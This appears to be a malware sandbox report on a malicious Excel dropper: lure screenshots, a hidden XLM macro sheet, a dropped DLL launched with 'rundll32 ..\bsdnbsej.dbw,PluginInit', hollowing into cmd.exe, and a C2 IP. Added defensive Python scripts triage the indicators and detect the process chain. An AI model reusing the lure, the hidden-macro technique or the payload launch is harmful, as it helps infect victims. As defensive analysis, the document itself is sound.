Source: unknown | Network traffic detected: HTTP traffic on port 443, in both directions, for 37 local ports: 49709, 49735 and 49738 through 49772
Source: unknown | HTTPS traffic detected: 104.21.64.132:443 -> 192.168.2.4:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.222.240.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.163.9.216:443 -> 192.168.2.4:49739 version: TLS 1.2
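Most of the URLs listed above are not indicators of this sample. They come from one cmd.exe memory dump (…05040000…) that the "Binary string: crypt32.pdb source:" lines further down in this section attribute to crypt32.dll, and they are the CPS, CRL and OCSP URLs of public root CAs; the trailing "0", "0=", "09" characters are most likely the next DER element (0x30 is the SEQUENCE tag) glued onto the string by the extractor, so they should not be trimmed or treated as part of a URL. The strings that matter are the ones in the rundll32.exe heap dumps pointing at https://18.222.240.99/, which the HTTPS traffic line then corroborates as an actual TLS peer. The script below is an added triage example, not part of the report or of Joe Sandbox. It takes report lines (copied from this page, in the fused form as scraped; a " | " separator is also accepted), maps each dump to the PDB names the report associates with it, and separates library artifacts from candidate IOCs, then intersects the candidates with the observed TLS servers. The dump-to-library mapping is a heuristic: a dump can contain more than one module, so treat the output as a triage aid rather than ground truth.

```python
"""Triage of 'String found in binary or memory' and network lines from a sandbox report.
Added example, not part of the report or of Joe Sandbox.  A memory dump that also
yields a 'Binary string: <lib>.pdb source:' line is assumed to be that library's mapped
image, so URLs from it are classified as library artifacts rather than IOCs (heuristic)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Matches both the scraped form '...sdmpString found...' and the separated form '...sdmp | String found...'.
STRING_RE = re.compile(
    r"^Source: (?P<proc>[^,]+), (?P<dump>\S+?\.sdmp)\s*\|?\s*String found in binary or memory: (?P<url>\S+)")
PDB_RE = re.compile(
    r"^Source: Binary string: (?P<pdb>\S+?\.pdb)\S* source: (?P<proc>[^,]+), (?P<dump>\S+?\.sdmp)")
TRAFFIC_RE = re.compile(r"HTTPS traffic detected: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) -> ")


def index_library_dumps(lines):
    """dump name -> set of PDB file names the report saw in that dump."""
    libs = {}
    for line in lines:
        m = PDB_RE.match(line)
        if m:
            libs.setdefault(m["dump"], set()).add(m["pdb"].lower())
    return libs


def host_kind(url: str) -> str:
    if "%" in url:                       # printf-style template: code, not a contacted host
        return "template"
    host = urlsplit(url).hostname or ""
    if not host:
        return "malformed"
    try:
        ipaddress.ip_address(host)
        return "ip_literal"
    except ValueError:
        return "hostname"


def triage(lines):
    libs = index_library_dumps(lines)
    rows = []
    for line in lines:
        m = STRING_RE.match(line)
        if not m:
            continue
        lib = sorted(libs.get(m["dump"], ()))
        rows.append({"process": m["proc"], "dump": m["dump"], "url": m["url"],
                     "kind": host_kind(m["url"]),
                     "verdict": f"library artifact ({', '.join(lib)})" if lib else "candidate IOC"})
    return rows


def candidate_hosts(lines):
    """Hosts from strings that no mapped library explains."""
    return sorted({urlsplit(r["url"]).hostname for r in triage(lines)
                   if r["verdict"] == "candidate IOC" and r["kind"] in ("ip_literal", "hostname")})


def observed_servers(lines):
    """TLS servers taken from the 'HTTPS traffic detected' lines."""
    return sorted({m["ip"] for m in map(TRAFFIC_RE.search, lines) if m})


def corroborated_hosts(lines):
    """Hosts that appear both as a string in a payload process and as an actual TLS peer."""
    return sorted(set(candidate_hosts(lines)) & set(observed_servers(lines)))


# Lines copied from this report (scraped, fused-column form), a small representative subset.
SAMPLE_LINES = [
    "Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.eme.lv/repository0",
    "Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0",
    "Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://%s/%s/%sendcahttps://%s.pinrules.crt/%sRetrieveValidatestaple:OcspGetOcspPostOcspFailoverExp",
    "Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/",
    "Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/update/info",
    "Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: https://HTTP/1.1",
    "Source: unknownHTTPS traffic detected: 104.21.64.132:443 -> 192.168.2.4:49709 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 18.222.240.99:443 -> 192.168.2.4:49735 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 54.163.9.216:443 -> 192.168.2.4:49739 version: TLS 1.2",
    "Source: Binary string: crypt32.pdbUGP source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp",
    "Source: Binary string: crypt32.pdb source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp",
    "Source: Binary string: wininet.pdbUGP source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp",
    "Source: Binary string: bcrypt.pdb source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        print(f'{r["process"]:<13}{r["kind"]:<11}{r["verdict"]:<32}{r["url"]}')
    print("candidate hosts:", candidate_hosts(SAMPLE_LINES))
    print("tls servers:   ", observed_servers(SAMPLE_LINES))
    print("corroborated:  ", corroborated_hosts(SAMPLE_LINES))
```

On the lines above this yields a single corroborated host, 18.222.240.99; the two other TLS servers (104.21.64.132 and 54.163.9.216) appear only in traffic, which this report's string evidence does not attribute to a process.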

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet 13 ' k 14 0 Protected
Source: Screenshot number: 4 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc
Source: Screenshot number: 8 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 8 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
Found Excel 4.0 Macro with suspicious formulas
Source: Documents_111651917_375818984.xls | Initial sample: EXEC
Source: Documents_111651917_375818984.xls | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Documents_111651917_375818984.xls | Initial sample: Sheet size: 4672
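The two Excel 4.0 signatures above rest on one structural fact about the file: the workbook carries a macro sheet (sheet type 0x01 in its BOUNDSHEET record) whose visibility state is hidden or very hidden, and that sheet holds formulas such as EXEC and CALL. The first check a triager can make without executing anything is to walk the BIFF records of the Workbook stream and list every sheet with its type and visibility. The following script is an added example, not code from the report or from Joe Sandbox. It parses BoundSheet8 records as laid out in [MS-XLS], runs against a constructed in-memory stream so it works offline, and can optionally read a real .xls through the third-party olefile package. It does not decode the formula records themselves (finding EXEC/CALL needs a formula-token parser), so a visible macro sheet or a hidden worksheet is reported but not flagged.

```python
"""Enumerate the sheets of a BIFF8 Workbook stream and flag hidden Excel 4.0 (XLM)
macro sheets, the condition behind the sandbox signature above.  Added example, not
part of the report or of Joe Sandbox.  Record layout follows [MS-XLS] BoundSheet8;
the sample stream at the bottom is constructed."""
import struct

RT_BOF = 0x0809
RT_EOF = 0x000A
RT_BOUNDSHEET = 0x0085
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro", 0x02: "chart", 0x06: "vba"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very_hidden"}
EOF_RECORD = struct.pack("<HH", RT_EOF, 0)


def iter_records(stream: bytes):
    """Yield (record_type, body) for each BIFF record: u16 type, u16 length, then body."""
    off = 0
    while off + 4 <= len(stream):
        rt, ln = struct.unpack_from("<HH", stream, off)
        yield rt, stream[off + 4:off + 4 + ln]
        off += 4 + ln
        if rt == RT_EOF:        # BOUNDSHEET records live in the Globals substream,
            break               # which ends at the first EOF


def parse_boundsheet(body: bytes) -> dict:
    """Decode a BoundSheet8 body: lbPlyPos, hsState/dt flag word, ShortXLUnicodeString name."""
    lb_ply_pos, grbit, cch, str_flags = struct.unpack_from("<IHBB", body, 0)
    hs_state = grbit & 0x03             # bits 0-1: 0 visible, 1 hidden, 2 very hidden
    dt = (grbit >> 8) & 0xFF            # high byte: sheet type, 0x01 is an XLM macro sheet
    raw = body[8:]
    if str_flags & 0x01:                # fHighByte set: UTF-16LE name
        name = raw[:2 * cch].decode("utf-16-le")
    else:                               # compressed 8-bit name
        name = raw[:cch].decode("latin-1")
    return {"name": name, "offset": lb_ply_pos,
            "type": SHEET_TYPES.get(dt, f"unknown_{dt:#04x}"),
            "visibility": VISIBILITY.get(hs_state, f"unknown_{hs_state}")}


def list_sheets(stream: bytes) -> list:
    return [parse_boundsheet(body) for rt, body in iter_records(stream) if rt == RT_BOUNDSHEET]


def hidden_macro_sheets(stream: bytes) -> list:
    """Macro sheets whose state is hidden or very hidden; an empty list means the check passes."""
    return [s for s in list_sheets(stream)
            if s["type"] == "macro" and s["visibility"] != "visible"]


def build_boundsheet(name: str, dt: int, hs_state: int, pos: int) -> bytes:
    """Build a BoundSheet8 record with a compressed 8-bit name (used only for the constructed sample)."""
    body = struct.pack("<IHBB", pos, (dt << 8) | hs_state, len(name), 0) + name.encode("latin-1")
    return struct.pack("<HH", RT_BOUNDSHEET, len(body)) + body


# Constructed sample stream: BOF, one visible worksheet, one very-hidden XLM macro sheet, EOF.
BOF_RECORD = struct.pack("<HH", RT_BOF, 16) + bytes(16)
SAMPLE_STREAM = (BOF_RECORD
                 + build_boundsheet("Sheet1", 0x00, 0, 0x1000)
                 + build_boundsheet("Macro1", 0x01, 2, 0x2000)
                 + EOF_RECORD)


def workbook_stream_from_xls(path: str) -> bytes:
    """Extract the Workbook (BIFF8) or Book (BIFF5) stream from a real .xls using the olefile package."""
    import olefile  # third-party, imported lazily so the constructed sample runs without it
    ole = olefile.OleFileIO(path)
    try:
        return ole.openstream("Workbook" if ole.exists("Workbook") else "Book").read()
    finally:
        ole.close()


if __name__ == "__main__":
    import sys
    data = workbook_stream_from_xls(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_STREAM
    for sheet in list_sheets(data):
        print(f"{sheet['name']:<32}{sheet['type']:<12}{sheet['visibility']}")
    print("hidden macro sheets:", [s["name"] for s in hidden_macro_sheets(data)])
```

Run it with a path argument to inspect a real workbook, or with none to see the constructed sample. A very-hidden macro sheet cannot be unhidden from Excel's UI, which is why the combination of type 0x01 and state 2 is a strong signal on its own.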
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\bsdnbsej.dbw
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_67328FD4 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_67329272 CreateProcessA,NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6732353B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6732F5B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_67331580
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6733A4E1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_67387C26
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6738B44E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6739798C
Source: Documents_111651917_375818984.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
Source: Joe Sandbox View | Dropped File: C:\Users\user\bsdnbsej.dbw 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6732ACF0 appears 34 times
Source: Documents_111651917_375818984.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-M
Vbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: classification engine | Classification label: mal100.expl.evad.winXLS@5/13@1/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\29779F63.emf
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{4e207749-963e-4384-8e88-b716f4ea4ff2}
Source: C:\Windows\SysWOW64\cmd.exe | Mutant created: \Sessions\1\BaseNamedObjects\{809d51db-050d-477f-a665-11706e16a8a0}
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{006DB4C5-B21C-4B55-8F31-0A3839BFD91D} - OProcSessId.dat
Source: Documents_111651917_375818984.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
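The process chain recorded above is the detection opportunity: EXCEL.EXE starts rundll32.exe with a relative module path and a non-DLL extension (..\bsdnbsej.dbw, the same bytes as the downloaded vegas[1].dll) and an export name (PluginInit), and that rundll32 then starts cmd.exe with nothing but the image path, the typical shape of a hollowing target given the CreateProcessA and NtUnmapViewOfSection calls listed for rundll32 earlier in this section. The script below is an added example, not code from the report or from Joe Sandbox. It encodes those three observations as rules over process-creation events and evaluates them against a constructed event list that mirrors the report's process tree plus one benign rundll32 control. The event shape (pid, ppid, image, cmdline) is an assumption chosen to match what Sysmon Event ID 1 or any EDR provides; the rules are illustrative and would need tuning for an environment's own rundll32 usage.

```python
"""Detection logic for the process chain in the report (EXCEL.EXE -> rundll32.exe loading
..\\bsdnbsej.dbw,PluginInit -> cmd.exe), run over process-creation events.  Added example,
not part of the report; the events below are constructed to mirror the 'Process created'
lines and are not Sysmon or EDR output."""
from pathlib import PureWindowsPath
from typing import Optional

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RUNDLL_MODULE_EXTENSIONS = {".dll", ".cpl", ".ocx"}   # what rundll32 is normally asked to load


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def parse_rundll32(cmdline: str):
    """Return (module, export) from 'rundll32[.exe] <module>[,<export>] ...', or None.
    rundll32 itself ends the module name at the first comma; quoted module paths that
    contain spaces are not handled here."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2 or "rundll32" not in parts[0].lower():
        return None
    first_arg = parts[1].split(None, 1)[0]
    module, _, export = first_arg.partition(",")
    return module.strip('"'), (export or None)


def suspicious_rundll32(ev: dict, parent: Optional[dict]) -> list:
    """Rules on the rundll32 invocation itself: odd extension, relative path, Office parent."""
    if image_name(ev["image"]) != "rundll32.exe":
        return []
    parsed = parse_rundll32(ev["cmdline"])
    if parsed is None:
        return []
    module, _export = parsed
    path = PureWindowsPath(module)
    reasons = []
    ext = path.suffix.lower()
    if ext not in RUNDLL_MODULE_EXTENSIONS:
        reasons.append(f"module extension {ext or '<none>'} is not a DLL extension")
    if not path.is_absolute():
        reasons.append("module path is relative (resolved against the parent's working directory)")
    if parent is not None and image_name(parent["image"]) in OFFICE_IMAGES:
        reasons.append(f"parent is Office process {image_name(parent['image'])}")
    return reasons


def suspicious_child_of_rundll32(ev: dict, parent: Optional[dict]) -> list:
    """cmd.exe started by rundll32 with a bare image path and no arguments: the shape of a
    process created suspended to be hollowed rather than to run a command."""
    if parent is None or image_name(parent["image"]) != "rundll32.exe":
        return []
    if image_name(ev["image"]) == "cmd.exe" and len(ev["cmdline"].split()) == 1:
        return ["cmd.exe spawned by rundll32 with no arguments (process hollowing target pattern)"]
    return []


def evaluate(events: list) -> dict:
    """Map pid -> list of reasons for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        reasons = suspicious_rundll32(ev, parent) + suspicious_child_of_rundll32(ev, parent)
        if reasons:
            findings[ev["pid"]] = reasons
    return findings


# Constructed events mirroring the report's process tree, plus one benign rundll32 control (pid 400).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32 ..\bsdnbsej.dbw,PluginInit"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, reasons in evaluate(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The control event (shell32.dll with an absolute path and a non-Office parent) produces no finding, while the rundll32 from the report trips all three rules and its cmd.exe child trips the fourth; in a real deployment the relative-path and extension rules carry most of the weight, since Office-parented rundll32 alone is noisy in environments with add-ins.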
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: dnsapi.pdbUGP source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: wininet.pdb source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source: Binary string: bcrypt.pdb source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: msi.pdbUGP source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: ole32.pdbUGP source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr
Source: Binary string: ole32.pdb source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: msi.pdb source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdbUGP source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: Binary string: bcrypt.pdbGCTL source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: netapi32.pdb source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbUGP source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: netapi32.pdbUGP source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: wininet.pdbUGP source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: shell32.pdbUGP source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdb source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6733AC21 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6734D7A9 push esi; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_673896ED push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6734C6D1 push cs; retn 0000h
